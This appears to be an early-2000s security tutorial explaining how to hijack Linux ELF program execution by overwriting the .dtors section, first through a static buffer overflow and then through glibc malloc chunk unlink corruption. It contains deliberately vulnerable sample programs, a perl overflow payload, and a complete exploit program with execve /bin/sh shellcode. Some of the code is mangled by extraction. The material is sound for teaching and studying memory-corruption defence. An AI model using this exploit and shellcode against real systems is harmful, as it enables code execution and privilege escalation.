Cyber Security Expo
 
Overwriting .dtors using Malloc Chunk Corruption by Nipon on 05/09/02

Intro
Dtors Overwrite
Malloc Chunk Corruption
References

Introduction

I began this text with the intention of explaining the exploitation of programs by overwriting .dtors. But having observed the already available literature on this subject (utilizing buffer overflows and format strings) I decided, in an effort to bring some originality, to include an explanation of the process using malloc chunks. The problem with this is that memory chunk corruption is a lot more complicated than the theory of .dtors, so most of the paper deals with malloc. The two sections are pretty much independent of each other, so you can read them separately if you so choose.

NB: this will really make sense to you if you are familiar with programming languages such as C, and at least theoretical knowledge of assembly language. Such will be a big help when trying to understand how the pieces of code work.


Overwriting the Dtors Section

This text is based on the ELF executable format on the Linux operating system, but the theory is the same for many of the various file formats and environments that gcc works under. For this discussion it would be helpful to go over the execution of an ELF program.

The GNU C compiler (gcc), and GNU tools in general, keep track of the initialization and termination functions of a program by maintaining lists of pointers to them: .ctors (constructors) and .dtors (destructors). When a program is executed, the functions in .ctors are called, then main() is called and finally the destructors in .dtors are called.

An example:

 //xtors.c

 #include 

 

 static void ctor(void) __attribute__ ((constructor)); //Define ctor() 

as a 

 constructor

 static void dtor(void) __attribute__ ((destructor)); //Define dtor() 

as a 

 destructor

 

 int main()

 {

 printf("In main()\n");

 return 0;

 }

 

 void construct()

 {

 printf("Constructor called from .ctors (%p)\n",ctor);

 }

 

 void destruct()

 {

 printf("Destructor called from .dtors (%p)\n",dtor);

 }

 

 //EOF

 

$gcc -o xtor xtor.c
$./xtor
Constructor (0x8048464)
In main()
Destructor (0x8048484)

As proof that the .ctors/.dtors sections house these we check the contents:

 $objdump -s -j .ctors xtors

 

 ctor:     file format elf32-i386

 

 Contents of section .ctors:

 8049624 ffffffff 64840408 00000000           ....d.......

 

 $objdump -s -j .dtors ctor

 

 ctor:     file format elf32-i386

 

 Contents of section .dtors:

 8049630 ffffffff 84840408 00000000           ............

 

The third entry in both .ctors and .dtors is the address of construct() and destruct() respectively but in little endian notation.

Ok, so we know of sections in a file that have lists of addresses that program execution jumps to. Obviously .ctors becomes obsolete as soon as we can do anything to the program because it executes before main, so we are left with .dtors. Lets look at .dtors a little closer on a program we wish to exploit (so you are not left with the belief that this is all an evil plot by gcc, the rest of the examples will be g++ compiled):

 //DtorVuln.cpp

 #include 

 #include 

 

 void main(int argc, char argv[])

 {

 static char buff[] = "";

 cout<<"Performing useless string routine";

 strcpy(buff,argv[1]);    //three guesses ;)

 exit(0);

 }

 

 void forbidden()

 {

 printf("Sucess!");

 }

 //EOF

 

 $g++ -o DtorVuln DtorVuln.cpp

 $objdump -s -j .dtors vuln

 

 DtorVuln:    file format elf32-i386

 

 Contents of section .dtors:

 8049834 ffffffff 00000000              ........

 

We see that .dtors has been inserted here as well, despite the fact that there are not actually any destructor functions.

8049834 is the address of the start of .dtors
ffffffff is a counter that shows how many addresses of functions are stored in .dtors but because there are no addresses, it is -1.
00000000 is the null word that marks the end of the .dtors section

Now for a routine simple introduction to exploitation for this ideal world program.
First lets view the process from the situation of the common buffer overflow.
Bearing in mind the fact that the data is already initialized and not dynamic, we know that this will be placed in the .data section of the program.

 $objdump -h DtorVuln

 

 Sections:

 Idx Name                 Size                 VMA                 LMA                 File off                 Algn

 ...

 15 .data                   00000010         080497cc         080497cc          000007cc             2**2

                                         CONTENTS,    ALLOC,    LOAD,    DATA

 16 .eh_frame           00000050          080497dc        080497dc          000007dc             2**2

                                         CONTENTS,    ALLOC,    LOAD,    DATA

 17 .ctors                  00000008          0804982c        0804982c          0000082c             2**2

                                         CONTENTS,    ALLOC,    LOAD,    DATA

 18 .dtors                  00000008         08049834         08049834         00000834             2**2

                                         CONTENTS,    ALLOC,    LOAD,    DATA

 ...

 

We can see that from a simple buffer overflow, we can write past .data, .eh_frame, etc down to .dtors.

To work out how far we have to write, we simply take the offset of the .data section (0x7cc) from the offset of the .dtors section (0x834) which is 0x84, or for our purposes, a write distance of 132 bytes.

Lets give it a go, trying to jump to forbidden() from .dtors:
$./MemVuln `perl -e "print "A" x 104"`; print /xf2/x86/x04/x08
Performing useless string function
Segmentation fault

Why didn"t it work? Well the distance we calculated to write to .dtors will only have been accurate if the .data section is empty when we started appending A"s to it. Obviously it was not.

 $ objdump -S -j .data vuln

 

 vuln:     file format elf32-i386

 

 Disassembly of section .data:

 

 080497cc <__data_start>:

 80497cc:       00 00                   add    %al,(%eax)

 

 080497d0 

:

 80497d0:       38 98 04 08                                         

8...

 

 080497f4 

:

 80497f4:       00 00 00 00                                         

....

 

 080497f8 

:

 80497f8:       00 00 00 00                                         

....

 

Ahh, now we can calculate the write distance exactly. There are 2 Dwords between __data_start where strcpy begins writing to, and force_to_data at the end of data. With 4 bytes per Dword that means we have to write 8 less A"s.

Next attempt:

$ ./vuln `perl -e "print "A" x 96; print "\xf2\x86\x04\x08";"`
Performing useless string function
Success

And there we have it. But before we move on, I would like to discuss the effect of overwriting the data between our variable and .dtors.

The impact of overwriting the contents of the .data section will vary significantly from program to program, but once you have overwritten .dtors, the only thing that can oppose exploitation is an exit routine that relies heavily on initialized data. In general, this will not pose a problem.

The .eh_frame section contains pointers that deal with exceptions. In the unlikely event that an exception is thrown between writing .dtors and exiting, the execution will probably still pass through .dtors.

.ctors has had its moment by the time you can do anything to the program, so that is nothing to worry about.

In .dtors, the pointer counter (the tag with the value 11111111) is ignored on the vast majority of environments, so overwriting this will have no considerable effect. The biggest problem you will face as far as overwritten data is concerned will usually be the segfault that occurs when the execution comes to searching for the end of .dtors null tag (which we overwrote). As you are exiting the process anyway, a segfault will not matter as far as exploitation is concerned, but may be conspicuous.


Malloc Chunk Corruption

Ok, well malloc chunk corruption is a little more complicated than a simple overflow, so we are going to have to go over the process of malloc dynamic memory allocation.

The best reference for this is probably that of the creator of the glibc malloc implementation, Doug Lea: ftp://gee.cs.oswego.edu/pub/misc/malloc.c Chunks of free memory are stored in circular doubly linked lists called bins. Observe:

 +---------------------------------------------+ <-Begin chunk A

 | prev_size (size of the previous chunk)      |

 +---------------------------------------------+

 | size (size of this chunk)                   |

 +---------------------------------------------+

 | fd (pointer to next chunk in bin)           |

 +---------------------------------------------+

 | bk (pointer to previous chunk in bin)       |

 +---------------------------------------------+

 | (free space of any length)                  |

 +---------------------------------------------+ <-End of chunk A,Beginning 

of B

 | prev_size (size of chunk A)                 |

 +---------------------------------------------+

 

Note that prev_size, fd and bk are only implemented when the previous chunk is free. For the sake of efficiency, when the previous chunk is already allocated, these fields simply becomes extra data storage.

The "size" field is rather important in malloc management. Chunks are all in 8 byte alignment (their size is always a multiple of 8 bytes) so no matter what the value of the size field is, the last three bits must always be zero. Instead of creating extra fields to contain boolean information, malloc uses the last two zeros to hold certain useful chunk information.

The low-order bit (end zero) is used as the PREV_INUSE flag. If this is set, then the prev_size field is out of bounds. The prev_size field is used to find the start of the previous chunk, so it is not possible to access the previous chunk without it.

This malloc attack is in reality a heap overflow exploitation with lots of hurdles. For example:

char *string = malloc(5);

gets(string);

Of course things would be more complicated in the wild, but this is still theory. Gets() writes everything from STDIN to the chunk of memory that *string points to, until it sees a NULL character. When the user enters more than 5 characters, the rest of the input spills into memory and we have a heap overflow. Unlike the average heap overflow however, we are concerning ourselves with the actual management information of the malloc-ed memory. With write access to this internal information, we can have fun overwriting fields like "size" to gain control of execution.

Overwriting these management areas will not hand us the processor on a silver platter, we need to use it to trick other functions which use those areas. When does the organization of the allocated memory get fiddled with? Unless the sole purpose of the program is to waste system resources and make people throw stones at the programmer, our best chance to exploit the malloc implementation is when free() comes along and converts the allocated memory back to free memory.

Lets take a look at what management information we will overwrite, and what will happen to this overwritten information:

   +-------------------+ <-start

   | prev_size         |

   +-------------------+

   | size              |

   +-------------------+ <-string [Gets() starts writing into 

user_data]

   | user_data         |

   +-------------------+ <-end

   | size              |

   +-------------------+

 

Because this is an allocated chunk, the fd and bk pointers, and prev_size field of the chunk are not implemented and so are used as extra user_data space. When gets() writes the sixth character to *string (which has 5 bytes of data storage), it is reconstructing the size field of the next chunk from our input.

To exploit the program, we have to wait until something significant uses this overwritten management information. Lets see what free() does with it.

This code has been copied from malloc.c, as well as being trimmed and commented by me for this explanation.

/*---------------------free() excerpt---------------------*/

 

 void free(Void_t* mem)

 {

   mchunkptr       p;                    /* chunk corresponding to mem */

   INTERNAL_SIZE_T size;           /* its size */

   mchunkptr       nextchunk;       /* next contiguous chunk */

   INTERNAL_SIZE_T nextsize;     /* its size */

   int             nextinuse;              /* true if nextchunk is used */

   INTERNAL_SIZE_T prevsize;     /* size of previous contiguous chunk 

*/

   mchunkptr       bck;                 /* misc temp chunk pointer for linking 

*/

   mchunkptr       fwd;                 /* misc temp chunk pointer for linking 

*/

 

 

   /* free(0) has no effect */

   if (mem != 0) {

     p = mem2chunk(mem);               //convert mem to chunk

     size = chunksize(p);

 

     check_inuse_chunk(p);

 

     /*use size to get the next chunk, and its size*/

     else if (!chunk_is_mmapped(p)) {

       nextchunk = chunk_at_offset(p, size);

       nextsize = chunksize(nextchunk);

 

       /* consolidate backward */       //merge with the previous chunk

       if (!prev_inuse(p)) {                //if the previous chunk is not in use

         prevsize = p->prev_size;

         size += prevsize;                                     //combine chunks

         p = chunk_at_offset(p, -((long) prevsize)); //point to top of chunk

         unlink(p, bck, fwd);                                   //remove from list       

             }

 

       if (nextchunk != av->top) {   // if not bordering the top of memory

         /* get and set inuse bit */

         nextinuse = inuse_bit_at_offset(nextchunk, nextsize);

         set_head(nextchunk, nextsize); //nextchunk-size = nextsize

                                                       //It is here that size needs to be a valid pointer.

         /* consolidate forward */         //merge with the next chunk

         if (!nextinuse) {                      //if nextchunk is unused

           unlink(nextchunk, bck, fwd); //remove nextchunk from list

           size += nextsize;                 //add it to this chunk

         }

 

         /*

           Place the chunk in unsorted chunk list. Chunks are

           not placed into regular bins until after they have

           been given one chance to be used in malloc.

         */

 

         bck = unsorted_chunks(av);

         fwd = bck->fd;

         p->bk = bck;

         p->fd = fwd;

         bck->fd = p;

         fwd->bk = p;

 

         set_head(p, size | PREV_INUSE);  //set PREV_INUSE flag at header

         set_foot(p, size);               //ditto at footer

 

         check_free_chunk(p);

       }

 

       /*

          If the chunk borders the current high end of memory,

          consolidate into top

       */

 

       else {

         size += nextsize;

         set_head(p, size | PREV_INUSE);

         av->top = p;

         check_chunk(p);

       }

      }

    }

 //End of free() excerpt

 //Begin unlink excerpt

 

 /* This removes p from the linked list, stranding it in memory */

 #define unlink(P, BK, FD) {  \

   FD = P->fd;  \ //FD made pointer to the chunk forward in list

   BK = P->bk;  \ //BK made pointer to the chunk previous in list

   FD->bk = BK; \ //[A] pointer to previous chunk is assigned  to bk of next chunk        

   BK->fd = FD; \ //[B] pointer to  next chunk is assigned to fd of prev chunk

 }

 

 //End define exercept

 

Now look at the code to see where we can change execution with the control of the chunk that we have. The unlink code is most interesting in this situation, because with control of the "fd" and "bk" pointers, we can specify what to write, and where to write it.

Here is how we will do it:

  • Write the address of the memory we wish to overwrite in "fd". This will be somewhere that execution will jump to like a function pointer.
  • Write the address we wish to place in this memory into "bk" (probably the address of our shell code).
  • Ensure that all size fields we overwrite have their PREV_BUSY least significant bit set to 0. As you can see from the free() code, we wont get much done if free() wont even process the chunks we are dealing with.

This is not strictly accurate, as we have to deal with the offsets that the data is written to. At [A], BK is written to FD-bk (12 bytes past the address we want to write to), but this is easily solved by just taking 12 bytes from the address we supply.

It looks good so far, but we have a problem: At [B], the address we supplied will be written at BK plus the offset of fd (8 bytes past the start of our shellcode).

After the overwrite, the shellcode will look like this:

SSSS SSOO OOSS SSSS SSSS...

This is quite handy really, because the first few bytes of intact shellcode are enough to store the code for jumping over the first 12 bytes to our shellcode. ( \xeb\x0a )

What should happen when unlink is called is that unlink will overwrite the memory we specified in "fd" with our "bk" supplied address at the code marked with [A]. [B] will then attempt to sabotage our shellcode, and fail.

Time to test it out! Here is the classic useless vulnerable code that which we will exploit.

 //vuln1.cpp

 

 #include 

 #include 

 #include 

 

 int main(int argc, char *argv[])

 {

 char *chunk1 = (char *)malloc(130);

 char *chunk2 = (char *)malloc(30);

 cout<<"Performing pointless string moving routine"<

This program requests 130 bytes of memory. As all chunks have to be on an 8-byte alignment, this will be rounded up to 132. The chunk also needs to include room for size, fd and bk (each 4 bytes), so the total size of the chunk is 132+(3*4). There is no sanity checking anywhere, so we have a free reign of the chunks after the data area of chunk1.

Now we have to craft our user input.

  • We place dummy fd and bk pointers into chunk1
  • Chunk1 is easily big enough for shellcode, so it goes in our input
  • During the course of free()s" execution, size is manipulated in various unpleasant ways. For the attack to work successfully, free() must be able to read size as a pointer. Thus size needs to be really big or really small for its value to loop around to validity when it has values added to it. Prev_size is added to size so it would be a good idea for it to be high (or maybe low) too.
  • The first size value of the second chunk must have PREV_INUSE cleared.
  • We need the location in memory to write our address to. We need to write to anywhere that the program execution will jump to after free(), so for this exploit we will overwrite .dtors which stores addresses that are jumped to when execution ends.
  • We need the address we wish to insert. In most cases this will be the address of our shellcode.

The shellcode used is just good old fashioned aleph1 shellcode with our address jumper inserted. The O"s are where the address will be written by free().

 $ g++ -o MemVuln MemVuln.cpp

 

 $ objdump -s -j .dtors MemVuln

 

 

 MemVuln:     file format elf32-i386

 

 Contents of section .dtors:

 80498f0 ffffffff 00000000                    .........

 

Here we have our first piece of information, the address of dtors. 0x080498f0 + 4 is the null byte that we can safely overwrite.

 $ ltrace MemVuln 2&1 | grep malloc

 malloc(130)                       =0x08049a38

 malloc(30)                        =0x08049ac0

 

We now know how much memory was requested, and can easily work out the real chunk size.

The address of the shellcode can also be calculated from this result. We are writing into the chunk a prev_size and a size field before we write the shellcode, so the address we will use is 0x08049a38+(2*4) = 0x08049a40.

Voila:

 /* Exploit.cpp

    MemVuln exploit */

 #include 

 #include 

 #include 

 #include 

 

 char shellcode[]=

 "\xeb\x0a" //this jumps 10 bytes to the real shellcode

 "xxxxxxOOOO" //the "O"s are overwritten

 //normal aleph1 shellcode

 "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46"

 "\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e"

 "\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"

 "\x80\xe8\xdc\xff\xff\xff/bin/sh";

 

 #define BUFFSIZE (132+(3*4)) //real size of chunk1

 #define SHELLADDR 0x08049a40 //address of the jumper at the start of 

our 

 shellcode

 #define DTORS 0x080498f4     //the null byte in .dtors

 

 #define FAKEFIELD 0xfffffffc //high to add to a pointer

 #define PREV_INUSE 0x1

 

 int main(int argc, char *argv[])

 {

 

 if (argc<<2){

   cout<<"Usage: ./Exploit program"<fd = FAKEFIELD

 p += 4;                                 //Move pointer accordingly

 *((void **)p) = (void *) ( FAKEFIELD ); //chunk1->bk = FAKEFIELD

 p += 4;

 memcpy(p,shellcode,strlen(shellcode));  //Add shellcode to buff

 p += strlen(shellcode);

 memset(p,"A",(BUFFSIZE-4*4)-(2*4+strlen(shellcode)));  //Fill data to 

the 

 end of chunk1

 p += (BUFFSIZE-4*4) - (2*4+strlen(shellcode));

 

 //Set our prev_inuse flag to 0 (chunk2->prev_size)

 *((size_t *)p) = (size_t) ( FAKEFIELD & ~PREV_INUSE );

 p += 4;

 

 //point chunk2->size to an integer with prev_inuse cleared

 *((size_t *)p) = (size_t) ( -2 );

 p += 4;

 *((void **)p) = (void *) (DTORS - 12); //chunk2->fd = dtors-12

 p += 4;

 *((void **)p) = (void *) (SHELLADDR); //chunk2->bk = shellcode

 p += 4;

 *p = "\0"; //end of buff

 

 ArgVector[0]= argv[1];

 ArgVector[1]= buff;

 ArgVector[2]= NULL;

 execve(argv[1],ArgVector,NULL);

 

 //should not reach here

 return -1;

 }

 /* EOF */

 

 $ g++ -o Exploit.cpp Exploit

 $ ./Exploit

 bash#

 

Hurray! We have executed our arbitrary code.

If not enough memory is requested by malloc to prove useful for holding shellcode, you could place the shellcode in an environmental variable and use techniques such as those outlined in "Smashing the stack" to get your hands on the address.

There is far more to corrupting memory chunks than fiddling with unlink() of the Doug Lea malloc implementation, and a great area of exploration awaits you, especially on other architectures.


References

1. Overwriting the ELF dtors section to modify program execution: A paper describing the .dtors overwrite using the buffer overflow.

2. Vudo Malloc Tricks: A superb paper with just about everything you need to know about the Doug Lea implementation.

3. Once upon a free: A paper covering malloc fun on Linux and System V off-shoots such as AIX and Solaris.

4. Real Exploit: A paper and exploit by Solar Designer about overwriting jpeg markers using a malloc overflow in netscape.

5. malloc.c: The fully commented malloc source code, keep at hand at all times while dealing with such matters.

Rate this article

All images, content & text (unless other ownership applies) are © copyrighted 2000 -  , Infosecwriters.com. All rights reserved. Comments are property of the respective posters.